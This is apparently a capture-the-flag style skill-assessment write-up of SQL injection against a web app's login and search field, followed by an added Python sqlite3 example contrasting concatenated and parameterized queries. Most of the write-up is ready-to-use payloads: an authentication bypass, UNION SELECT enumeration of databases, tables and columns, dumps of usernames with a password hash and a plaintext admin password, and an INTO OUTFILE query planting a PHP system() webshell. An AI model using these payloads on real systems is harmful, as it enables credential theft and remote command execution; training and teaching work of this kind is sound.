Skill Assessment
First I see a login, so I try a basic SQLi -->
admin' or 1=1-- -

Then I can see a search panel and info on names, so I test whether this field is vulnerable:


It is vulnerable, true. Now I try a UNION SELECT -->
ADAM' UNION SELECT 1,2,3,4,5-- -

Nice try daddy, now I list secure_file_priv, to see if this field is vulnerable:
ADAM' UNION SELECT 1,2, variable_name, variable_value, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Now I try to upload a webshell -->
adam' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -


No problem, I will try to display the databases and the admin password to log in and do the upload
ADAM' UNION select 1,schema_name,3,4,5 from INFORMATION_SCHEMA.SCHEMATA-- -

I list all databases and see ilfreight and backup, nice. With database() I check which database this webapp is using:
ADAM' UNION select 1,database(),2,3,4-- -

NICE, now I list all tables, columns and info -->
ADAM' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -

Now we can see all the content of these columns -->
ADAM' UNION select 1,2, username, password, 4 from ilfreight.users-- -

adam : 1be9f5d3a82847b8acca40544f953515
I try to log in again at the login... but...


NO SURRENDER! I will try to enumerate the backup database

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

Now I list the columns:
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

To finish, I display all the data of these columns -->
ADAM' UNION select 1,2, username, password, 4 from backup.admin_bk-- -

admin : Inl@n3_fre1gh7_adm!n
NOW YEAAAHHH, but... it is the same user I have... sooooo.

There is something I am doing wrong... The response message above is: Permission Denied... Yeah... but... the query is this:
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/shell.php'-- -

"Cant create to file in /var/www/html", but... I am in /dashboard/dashboard.php, so I try it -->
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/dashboard/shell.php'-- -
NO ERROR!! Search for the file

HOLY SH1T!! I NEED SLEEP
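
Why the search field behaved this way, and what closes it, as an added example (not part of the original writeup or the target application's code). It assumes Python's sqlite3 in place of the lab's MySQL, and the `payments` and `users` tables, their columns and their rows are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; this layout is an assumption, not the lab's real schema.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE payments (id INTEGER, name TEXT, month TEXT, amount TEXT, tax TEXT);
        INSERT INTO payments VALUES (1, 'ADAM', 'May', '100', '20');
        INSERT INTO payments VALUES (2, 'JAMES', 'June', '300', '60');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'adam', 'constructed-hash-value');
    """)
    return db

def search_vulnerable(db, term):
    # The input is concatenated into the statement, so a quote in `term`
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT id, name, month, amount, tax FROM payments "
           "WHERE name = '" + term + "'")
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The driver binds `term` as a value; it cannot alter the statement's structure.
    sql = "SELECT id, name, month, amount, tax FROM payments WHERE name = ?"
    return db.execute(sql, (term,)).fetchall()

# The five-column probe from the writeup, and the same shape of dump query
# pointed at the constructed `users` table (no schema prefix in sqlite).
PROBE = "ADAM' UNION SELECT 1,2,3,4,5-- -"
DUMP = "ADAM' UNION SELECT 1,2,username,password,4 FROM users-- -"

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__)
        for term in ("ADAM", PROBE, DUMP):
            print("   %r -> %r" % (term, fn(db, term)))
```

With the bound parameter, both payloads are compared as literal names and match no rows. The file write later in the writeup is a separate hardening point: it also needs the database account to hold the FILE privilege, and secure_file_priv and the directory permissions to allow the write.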
